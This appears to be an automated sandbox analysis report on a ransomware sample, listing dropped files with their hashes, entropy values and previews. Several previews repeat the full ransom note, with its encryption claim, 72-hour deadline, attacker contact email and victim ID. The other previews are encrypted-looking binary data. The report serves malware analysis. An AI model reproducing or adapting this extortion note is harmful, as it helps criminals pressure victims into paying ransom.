                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):436
                                                                                            Entropy (8bit):7.4754391807428435
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:rtoVA1ooHLStC7qzW5WOEtfCoaIUrNnWzXn:rtoVA1oMO5WxEKIyn6
                                                                                            MD5:500B042506BD9F0F796C817E21672BFF
                                                                                            SHA1:DFE128C5409807EB8035B39E35A8ACFE64E9081C
                                                                                            SHA-256:D2543DF3217F531778C8DF87E99D3DFDF2426D0A29EF6F1ACE2758CB58F4BDE9
                                                                                            SHA-512:7ACD5977B251FE4A8500985F3F4007F56C6D7E1FA23848C32462C9BBF3674C7D2825A66EC5D0C9A5386BD5D853A40BCF98E3AA45E1A923DE503AB4BBF9373230
                                                                                            Malicious:false
                                                                                            Preview:(.I......4..|`.......Rb...N$.i.91.........D..f.....05r5.....2.q.t......5......^'...dQs.X...* s..90.d.c-c|g....l.Mna.....G..f.>x....D...&... _....T...8.1.1.....XL..-:.uzH.c.te.S..........HX...gs1..v.........jR.{{....1...$....j..9.h;..O..zA.oB.E!c<.gNz.}.......F...d\......3.T...0....6.........O..Vg.q ......ahn.9.oA8..D`@j......p...].%...Vs.;.uzbZ.{s,S..h....%..c..gdw67.]d..LQ...}.;..I.V.......jz.H.....p..O0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1200
                                                                                            Entropy (8bit):7.847155794962282
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:KnYKEiF+XjEUZ8mkiZ6Mh1Ht26SuBOY7yEu9VG7sm0cXgX82:NuF+QUGmkiZBDNbynVlmlXqv
                                                                                            MD5:8B3154341739AE2F80F5DEC98EAFF249
                                                                                            SHA1:D426A11832629A4FEC6DDEB00B1FB776BCE2ECBF
                                                                                            SHA-256:EF137192259642800933F4047EA2BBC96953042BD1D5B800382E490770358D08
                                                                                            SHA-512:F0812BE47DF0184A50D34EA535F0E278D609572B42D3B0CFB7A259024AFC869BBF1B45B1560F53D5B9C3374BDB9C3345C6C6B091C85B4B4B068D7BDC214CD1FA
                                                                                            Malicious:false
                                                                                            Preview:.._.jX....~Q............^.w:R.'.......{.9rf........J.z7.K...v\.&..o...k_.L.:.q7...u.$..u.d...!....,re.k..).......+.k..+...V.`<...G..P.H|..j.a\.pL..B.R....q.......X...,.9.'..h!l.&...^>\..#PK...e..........i!...u.S..X.AC.........u.....s..g.`[.6..!.....*.~.,5 O.....iM@.....5....{.[..Y..`...h....+E..?...*.@...Wh..,(......s?.?.3.X0...*.b....H............c..{Q.]...T.c.@.>C.G.'.n.....E..c.|...T]..x*.k.Qi.....y....K.f....-...@. H|zw..u..Dx....G.}...d0.DU...q....O....l...p...5..~..k..D..ki.'..].v...kyN.a..)...oP.\2....9(y..W...F@57_+cko..+..?....9&..u?{..............d.2R.w].&^.]..,.#.R..3...|.k.z2....O.?....+y.$.$....kM..l4<..kC..-.+8'.%,..d.q.,...;.$..V.t8T!r?;Qy."..Eyby..[.4E\.[.I.NYq......BR..........a~..q`....7.H.....,.z....n..1...C&....Th.y.<...,.?....6.....#..c*8'.cWp.,......2.....P...g<..B...J.j...j..m..4.".t.G......gp...qHD...J......%3.dQhm..r&..|.8.R...@>.9.^a'.=>..x.4.2.....[}2.v3..+...F.@....B.h$Z.(...W..~.sC:.T.>.(........,d.._.>....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):262410
                                                                                            Entropy (8bit):3.1599382313194804
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:1ty0biBRf/kjFbUJ5zkBijAXU6fMo0BSYKLQty:jy1BRf/O0zzANUoGP8Qty
                                                                                            MD5:7B21C15D60B461E14F0EC01838A87A75
                                                                                            SHA1:8F0B1136E1F0519DF001C8D98FBB176A9990E300
                                                                                            SHA-256:76D09E246DC1738E65C28D7FDA41BCEAF70D93234106683111ED15790BE086C6
                                                                                            SHA-512:13310F9FB21CA2C5937482D60EA0159E56EDCB98B185C5DD3D30918EFE378BB6105568EB3F7580D663629D5CE19DF84554583F783D805EDFCB3C47330A5AB21F
                                                                                            Malicious:false
                                                                                            Preview:.e..|.u..~(-..W...u?.Q9.5`v...Z.v6...h...U.h1..dr-.W../V!."2.zW.8#......5.v..0?]]..........0...J&...SH..?...P.z..M+4Yf..x.?..]NT4F`.&e....@.+..E....I<...p...m.[........8X....h.....xfSY.C.*.Fb....Hd...*.?.A......et%.R..t.[.|^....'C/"...by5..YI...:.2....d.L^.]....+...WOPJ.2Hu.8pc.B3.........W..G..0.jW..(.T.p.zh..J....5.............B....Sj..j....#C..t.*....V.._..\.HZ.~.............r&..L......ln.....|...\9..r.G/@P..(Q..._..s..*^a.y.}...|..7..q.jY...8.7......G...8..._.=z5..\^-<.oI.:hVmtY...P.y0.......PjGtg.5._.=.%..u.W...RG\e.b.....;W...5.V...t.3..y...f...H.S../]8W..Z..H;T~.=.-%....y__..6.X.,...}......1.e.ysx..{.......S.......Q..[g..2f.K|.x.!.6.............Y......_...3....WG....x..$.......]2N."....;|.>........}.b0........u../....q.W.y.5F....P.....F&..X.*HP.C....f.....&...]..e..........]..$.=?t}f...nUxf.(v6.$.|.L)...<.y......C....[.8.}W.....v.....U!......h..8*.c.NQ..#.1o....z[.V.n..... ..V8.3...@..Yd./..k...^LSH.'.w....t....Z?n."3..k.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):65802
                                                                                            Entropy (8bit):3.4014070549794893
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:XrX8H5jOaeT8WRlSjPWxz4luNutcLUIMyzt9e0eOMymgb:L8H5USjGtr
                                                                                            MD5:2546390FFC671C1F21D5CB8E246F11BD
                                                                                            SHA1:3A4D5128B834E2FD0447E45532C1D59F621670C8
                                                                                            SHA-256:01E231EB247373994DCB79141363D2F388230F9F1C465D09C8B9350AB6DE6BA2
                                                                                            SHA-512:54CC1EEB2A2C996AA4E8017F92CE34E53AD6672DA889834FC65D728F43B7F8D5F677CA9D99BA7F3AABE18BB9616CA43D85CF3900AB8F2CBED36C8510D7F45A51
                                                                                            Malicious:false
                                                                                            Preview:c..g~..mS...h..V......=.'W.t.r.w.@.`....N..f.\q...@.H...z~.w*.f\.\)....c........._...=.R0k.Z.Y.7.....".......$....~.r..0.ro.a..#..}...+..^..|bu....I..2..sA.)...u....=....X...=g..<...L..v....(C.:}.o.........'...at.VqA..hD:2.D.@.i.m.A.*Z....#..........')f....'......P&.]...9..w#k.V=.8_. E.(w..o..Xk=.@+fWG. -z&....u...(|..2....".`........b...`C...I.Y'......$..&.)!tj.-d4".OX]...z..j$.G...D?<.........q......"....X_.....SxH......Vr.2b..Gz`....?M...u..[...fC..;.%.}........q9`N..A.1]T~.3.......;.....b..g......4..n]. h.eM....uT.i.7..F_..p......./...8......*@.E.....l.b_..d.%.`w..}[..-.....z......[.1.%.R.".y*:C.N..............x.Ub..C..@]t.....p...!.-v...0C..b...G.z.L...&.x[...W..F8+#.G/.k.c@.B..3=..k...#..dS`D...gq...(...@...8.c.g.W.%./...8|..8...........Q.......1m.`X..[..."....C.p...:..]...#.L..%.qr.k.....v..dca3.;......i.....1.....cd2nv>...O...I.....N.w.q....5.^..7..W.Z..!<O\:...Hy...`@.?b`vN...i.E..[....X....B.+Z..(@nU.Y.I.x.%.O...U...%|.Ni..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):20746
                                                                                            Entropy (8bit):4.753541268884374
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:eeN9CPbERgfAj2f5RlIEgA5gtt2DWCz0389zcg3Xa7b:eiCTAyl5z0M9zNQ
                                                                                            MD5:3CFA5A4374696728924AD2FBD6AAD819
                                                                                            SHA1:091BE19A708A3C5143EEA0D5E9E25CA4E183D73B
                                                                                            SHA-256:623C82BE7D77A8C64BC88F5E98DD35A62350F10BB2DC45BE3CF06916F02A8E32
                                                                                            SHA-512:951111A9BAA13EE3496FE011DEB46699A4D3AEE72D4E107263F345FBDA24A1D879B79BFACAAF1A79877E24B79122A8A005BB3DDAF5C0DEAB2881B24769F258D5
                                                                                            Malicious:false
                                                                                            Preview:..y.B..N..G..YDx...yl..Akwf.....Kg..<.P..S./.o.!S4...E{c.:..1.Kq.....$fd.w....IB[..tY".......x..qH........h(.*.p..).?...&.....[.Q...*..+..c..=Q..K..ui..cc'....H.$^GI)"9..PHV..x...x.d.`...7....l...m........T.N..w..0.D.d..O....|C.7...8ROnb.4^..\....X.B..jb.....waU..1(1y..=....q.M.a...... ......Q....v...m...p.S...G{.".#.T.s.k..."j.K.Sn...Y.o...!P/)^..<......_+.....z.|..n...m[....P~...U...(..&.Ee{z.1...p....)2.4.9..$d....4}.ic9..."....3.;6+.B\...{...JL.,.|a9a.C;_....%.i.4.t.Y}.:.8.}...)4E..N.v.E@...O..|....s..a............|....nM.&I.sEr....3.q.........p3*..^.v.*.}m:I.$.@q.bRGd4nl.'.mV%.FT.~.&.^.....d..p....Q5..U..N.O1.z..G....Z.7.!....L......s.(.....h.3....y.5....?.J......viz,.G.th...P9W.a.[#...BVOS.A..M.L.T....e.aK/.../H...b...s...LJy..pR..$..>...T6..-.U!i.c..^9...\..@f*4.:.&.?FQ....w.R..A..8..8.'.|..........eZ..v...........,...m.._;..WI.'..[L.u...z..qh..a.......V(.......l.>.U[.,....^./...)..kJ6..Z...p...s}...6.=..~.Y<m.=.......}.'B.@.<
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):65802
                                                                                            Entropy (8bit):1.0509171643534747
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:8XxMmhqowx0ToiiWfoOeLxNmcCBchpcmZX/Fe7tprRk7VG7Vkak7tLrRk7VG7VX/:TmQLCToiiWf2mKpcmZXGDRkseaWxRksF
                                                                                            MD5:784E6AA648FC613F0C73C95A84201FED
                                                                                            SHA1:380E9BBF8C713F54F4423D302CA4BFF9BB741681
                                                                                            SHA-256:82128DF7AF07CC0440E5C25B394322E09BF8878961C368E04EE356227572FEE6
                                                                                            SHA-512:900D3D96885F4BB751A5BA53E430B29C00B87A54323785E92F5BDD6902151841FF966214C527FAA127299A07EEFCB08DF19DB7952F3B23C0E9CBF37E89E3A706
                                                                                            Malicious:false
